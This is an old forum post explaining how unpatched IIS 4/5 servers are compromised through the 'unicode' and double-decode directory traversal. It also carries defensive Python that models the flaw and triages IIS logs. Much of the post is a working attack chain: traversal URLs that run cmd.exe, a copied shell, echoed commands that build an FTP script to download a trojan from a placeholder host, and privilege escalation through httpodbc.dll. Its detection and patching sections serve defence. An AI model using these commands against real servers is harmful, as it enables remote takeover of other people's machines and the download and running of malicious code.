I had to add quotes and such because this BBS is messing with some stuff.

I will try my best to use complete sentences, like I learned in 3rd grade.

I KNOW THIS IS AN OLD VULN, BUT MANY MANY MACHINES ARE STILL HACKED THIS WAY, SO I'M POSTING IT. Please patch yourselves.


Disclaimer: none of this information is to be used out of context. I am not responsible for how you use it, or for what your mind chooses to do with it. Furthermore, it is educational, and for that purpose only.

First I will start with how it is done, then how it is used, then how to defend, and lastly how to fix.

The first step in hacking IIS "unicode" machines, those vulnerable to the ..%255c../winnt/system32/cmd.exe type of request, is finding them. (Strictly speaking, %255c is the double-decode variant, MS01-026, and the overlong UTF-8 forms such as %c0%af are the original Unicode traversal, MS00-078; scanners, and this post, treat them as one family because they are exploited exactly the same way.) Usually this is done with a custom scanner, or from other systems the attacker already controls. The scanner starts by fingerprinting hosts, typically sweeping random addresses and keeping the ones that identify themselves as IIS 4.0 or IIS 5.0. Each of those hosts is then tried against some 200 traversal variants (different encodings of the ..\ separator, different virtual directories to start from). Which ones succeed determines how the box gets exploited. So, let's get into it.
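Why there are "some 200" variants, and why a server that blocks a plain ../ still lets these through, comes down to the order in which the old IIS decoded and checked the path. The following is an added example, not IIS code and not from the original post: it re-implements that order of operations as a small model so you can watch ..%255c.. (decoded twice) and ..%c0%af.. / ..%c1%1c.. (overlong UTF-8 turned into characters after the check) get past a check that catches the obvious form, next to a resolver that does the steps in the right order. The directory mapping (/scripts to C:\inetpub\scripts) is assumed.

```python
"""Model of the IIS 4/5 decode-order bugs behind the "unicode" traversal.

Added example, not IIS code: it reproduces the ORDER of operations that made
the traversal check fail, so the reader can see why ..%255c.. (double decode,
MS01-026) and ..%c0%af.. / ..%c1%1c.. (overlong UTF-8, MS00-078) slip past a
check that does catch a plain '../'.  The /scripts mapping is assumed.
"""
import posixpath
from urllib.parse import unquote_to_bytes

SCRIPTS_ROOT = "C:\\inetpub\\scripts"   # assumed mapping of the /scripts virtual directory
WWW_ROOT = "C:\\inetpub\\wwwroot"       # assumed mapping of /


def lenient_utf8(data: bytes) -> str:
    """UTF-8 -> text the way the old decoder is modelled here: a two-byte lead
    (110xxxxx) is merged with the low six bits of the NEXT byte, with no
    overlong-form or continuation-marker check.  That turns C0 AF into '/'
    and C1 1C into '\\'.  Three-byte forms are not needed for this model."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def has_dotdot_segment(path: str) -> bool:
    """The traversal check: is any '/'-delimited segment exactly '..'?
    A segment like '..%5c..' or '..\\xc0\\xaf..' is not, which is the point."""
    return any(seg == ".." for seg in path.split("/"))


def to_windows_path(virtual: str) -> str:
    """Map a virtual path onto disk, resolving '..' the way the file system
    does (both separators count, never above the drive root)."""
    segs = virtual.replace("\\", "/").split("/")
    if segs[:2] == ["", "scripts"]:
        stack, rest = SCRIPTS_ROOT.split("\\"), segs[2:]
    else:
        stack, rest = WWW_ROOT.split("\\"), segs[1:]
    for seg in rest:
        if seg == "..":
            if len(stack) > 1:
                stack.pop()
        elif seg not in ("", "."):
            stack.append(seg)
    return "\\".join(stack)


def vulnerable_resolve(uri: str):
    """Flawed order: percent-decode once, run the check on that, then decode
    AGAIN and only then turn UTF-8 bytes into characters.
    Returns ('ok', disk_path) or ('403', None)."""
    stem = uri.split("?", 1)[0]
    once = unquote_to_bytes(stem)                    # %25 -> '%'; %c0%af -> raw bytes C0 AF
    if has_dotdot_segment(once.decode("latin-1")):   # check sees '..%5c..' or '..\xc0\xaf..'
        return ("403", None)
    twice = unquote_to_bytes(once)                   # superfluous second decode (MS01-026)
    path = lenient_utf8(twice)                       # overlong UTF-8 accepted (MS00-078)
    return ("ok", to_windows_path(path))


def fixed_resolve(uri: str):
    """Correct order: decode exactly once, reject malformed UTF-8, canonicalise,
    and THEN decide whether the path is still inside /scripts.
    Returns ('ok', disk_path), ('400', None) or ('403', None)."""
    stem = uri.split("?", 1)[0]
    try:
        path = unquote_to_bytes(stem).decode("utf-8")  # strict: C0 AF / C1 1C raise
    except UnicodeDecodeError:
        return ("400", None)
    canon = posixpath.normpath(path.replace("\\", "/"))
    if not canon.startswith("/scripts/"):
        return ("403", None)
    return ("ok", to_windows_path(canon))


if __name__ == "__main__":
    for u in ("/scripts/../../winnt/system32/cmd.exe",
              "/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\",
              "/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/scripts/..%c1%1c../winnt/system32/cmd.exe"):
        print(f"{u:<75} vulnerable={vulnerable_resolve(u)} fixed={fixed_resolve(u)}")
```

Note what the fixed resolver does with the %255c request: after a single decode the segment is literally `..%5c..`, which is a harmless (non-existent) file name under C:\inetpub\scripts, so a patched server simply 404s it. That is exactly the 200-versus-404 distinction used in the log-checking section further down.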

Let's say you are doing this on yourself (you are the attacker):

http://127.0.0.1/

After you scan for vulnerable unicode strings, you see yourself as being vulnerable to

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe

which means your system is not secure against the unicode directory traversal, and thus a command prompt can be reached through it. At this point the attacker (I will refrain from using "hacker", because it is hardly that) will do a basic call of cmd.exe, something like


http://127.0.0.1/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\

which would display the contents of your C:\ drive in the browser. Note that at this stage cmd.exe runs as the web server's anonymous account (IUSR_machinename), not as SYSTEM; that is what the httpodbc.dll step further down is for.

Next, the attacker (you) makes a private copy of cmd.exe, so that later commands do not run into the problems that come with invoking the original cmd.exe directly (the echo redirections below are the usual sticking point).

Something like...

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe

Next, there are two different ways to get the files you want onto the target. One is too simple to need much explanation: use the tftp.exe client that ships with Windows to pull files from a TFTP server you run (tftp -i yourhost GET file.exe). It is not the most popular way, for the simple reason that a TFTP server is more work to set up.

Instead, the next thing the attacker will do is create an FTP script that downloads the files. Using echo commands, we build the script one line at a time:

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt

tempftp being the FTP server on which the files sit, 21 being the port.

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+login+>>+C:\inetpub\scripts\temp.txt

login = the FTP username.

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+password+>>+C:\inetpub\scripts\temp.txt

password = the FTP password.

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+get+temp.zip+>>+C:\inetpub\scripts\temp.txt

This line downloads the trojan/bot file. (It has to be appended to temp.txt like the rest of the script; redirecting into temp.zip would just create a bogus zip.)

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+get+httpodbc.dll+>>+C:\inetpub\scripts\temp.txt

httpodbc.dll is a commonly used privilege escalation: an ISAPI DLL that, once it sits in a web-executable directory such as /scripts and is requested, runs the command you give it with more than the IUSR privileges the traversal gives you (SYSTEM, where that directory's application runs in-process with inetinfo.exe).

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+exit+>>+C:\inetpub\scripts\temp.txt

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+echo+quit+>>+C:\inetpub\scripts\temp.txt

The script must end with quit, or else ftp.exe sits waiting for more input and the process (and your HTTP request) hangs. Strictly, exit is not an ftp.exe command and is just rejected, so quit is the line that matters; echoing both does no harm.

Then, to actually run the download, simply use...

http://127.0.0.1/scripts/..%255c../..%255c../..%255c../inetpub/scripts/temp.exe?/c+ftp.exe+-s:C:\inetpub\scripts\temp.txt

and ftp.exe will run your script and download all your files. One caveat: the Windows ftp.exe client only does active-mode transfers, so the data connection is opened from the FTP server back to the target; if inbound connections to the target are filtered, the get lines fail quietly and nothing lands.

Next, the attacker will call whatever they have placed in the web-accessible directory, in our case C:\inetpub\scripts, which the server exposes as /scripts (the file must be reachable through the web, but on most boxes it is):

http://127.0.0.1/scripts/httpodbc.dll

They enter the command to run, in our case

C:\inetpub\scripts\temp.zip (can be an .exe if self-extracting)

httpodbc.dll reports back that the command ran with escalated privileges.

This computer can now be completely controlled and used however the attacker wants; some IIS servers sit on T3 links as well, so there is plenty of bandwidth to waste.

I won't go into any more about how they are hacked, for fear of being banned.
I will answer more in-depth questions in private messages.



Catching The attack:

The easiest way to prevent this attack is simply to apply updates, which some don't do. There are many fixes for this problem, yet thousands of machines are still attacked. Warning signs are a machine that has become very slow or is using unusual amounts of bandwidth. If you want to backtrack and see when you were attacked, look in the IIS logs (by default under C:\winnt\system32\LogFiles\W3SVC1\) for anything resembling

GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir+c:\ 200

If the status is 404 instead of 200, that request failed (the traversal was blocked or the path did not exist); a 200 means cmd.exe actually ran for that request. Do not stop at the status code, though: the cs-uri-query column shows what was run, a scanner that got a 404 on one encoding may have got a 200 on another a few lines later, and the other encodings (%c0%af, %c1%1c, %%35c) and the renamed copy (/scripts/temp.exe?/c+..., which never mentions cmd.exe) need to be searched for as well.
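The log check above, written out as a script, as an added example that is not part of the original post. The log excerpt inside it is constructed to look like an IIS 5 W3C extended log with a reduced set of fields; the column layout is read from the #Fields header the way IIS writes it, so the same code copes with a real log's full field list. The signatures generalise the encodings in this post to "two dots followed by a still-encoded separator" and add the follow-on indicators from the walkthrough (cmd.exe or a renamed copy handed a /c command line, ftp.exe, tftp, httpodbc.dll); the triage rule is the author's: 404 means the traversal failed, 200 on a command means it ran.

```python
"""Triage of IIS W3C log lines for the "unicode" traversal family.

Added example, not from the original post.  SAMPLE_LOG is a constructed
excerpt in IIS 5 W3C extended format with a reduced #Fields list; field
order is taken from that header, as IIS writes it.
"""
import re
from collections import Counter, defaultdict

SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-10-01 03:12:44 10.0.0.7 GET /default.htm - 200
2001-10-01 03:13:01 198.51.100.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-10-01 03:13:01 198.51.100.9 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-10-01 03:20:15 192.0.2.5 GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-10-01 03:20:40 192.0.2.5 GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe 200
2001-10-01 03:21:02 192.0.2.5 GET /scripts/temp.exe /c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt 200
2001-10-01 03:22:30 192.0.2.5 GET /scripts/temp.exe /c+ftp.exe+-s:C:\inetpub\scripts\temp.txt 200
2001-10-01 03:24:05 192.0.2.5 GET /scripts/httpodbc.dll - 200
2001-10-01 03:30:00 10.0.0.7 GET /images/logo.gif - 304
"""

SIGNATURES = {
    # '..' followed by a separator that is still encoded after one decode
    # (%25.., %%.., overlong %c0/%c1 forms), or by the plain %5c/%2f scanners also try
    "encoded-traversal": re.compile(r"\.\.(?:%25|%%|%c0|%c1|%5c|%2f)", re.I),
    # cmd.exe itself, or any executable (e.g. a renamed copy) handed a /c command line
    "command-exec": re.compile(r"cmd\.exe|\s/c\+", re.I),
    # the download and privilege-escalation steps from the walkthrough
    "post-exploit": re.compile(r"httpodbc\.dll|ftp\.exe|\btftp\b|echo\+open", re.I),
}


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        parts = raw.split(" ")          # W3C format: space separated, spaces in values are '+'
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def classify(entry: dict):
    """Return a finding for a hostile-looking request, or None."""
    target = f"{entry['cs-uri-stem']} {entry['cs-uri-query']}"
    hits = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    if not hits:
        return None
    status = entry["sc-status"]
    if status == "404":
        severity = "probe"                # traversal failed: scanner noise, but note the source
    elif status == "200" and ("command-exec" in hits or "post-exploit" in hits):
        severity = "compromise-likely"    # the binary actually ran for this request
    else:
        severity = "investigate"          # e.g. 500/502: cmd.exe may still have run
    return {"time": f"{entry['date']} {entry['time']}", "ip": entry["c-ip"],
            "status": status, "hits": hits, "severity": severity, "request": target}


def scan_log(text: str):
    """All findings, in log order."""
    return [f for f in (classify(e) for e in parse_w3c(text)) if f]


def summarize(findings):
    """Per source IP: how many probes versus likely compromises."""
    per_ip = defaultdict(Counter)
    for f in findings:
        per_ip[f["ip"]][f["severity"]] += 1
    return dict(per_ip)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']} {f['ip']:<13} {f['status']} {f['severity']:<18} {f['request']}")
    print(summarize(found))
```

Run against the constructed excerpt, the two 404s from 198.51.100.9 come out as probes, while the sequence from 192.0.2.5 (dir, copy of cmd.exe, the echoed FTP script, ftp.exe -s:, then httpodbc.dll, all 200) comes out as a likely compromise, which is the pattern this post describes. On a real log, also search the lines that came after: once the attacker has temp.exe and httpodbc.dll, later activity no longer contains the traversal string at all.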



What the hell are these used for?:

The most common thing these machines are used for is serving warez/porn. I have seen other, more sophisticated things, such as BNCs, tunnels, IRC servers, FXP servers, e-mail hosts, and just about as much as you can imagine.


The most secure way to fix this problem: if you aren't infected, update (MS00-078 and MS01-026, or whatever cumulative IIS patch is current); if you are, you most likely need to clean your whole system, which realistically means rebuilding it. Treat it as any other compromise: the attacker has had a privileged shell on the box, so nothing on it can be trusted.


BOTTOM LINE:

Please upgrade this stuff, it's been out for almost two years, and I'm getting tired of seeing them online. Just because you're behind a firewall doesn't mean you're safe from lame old attacks either.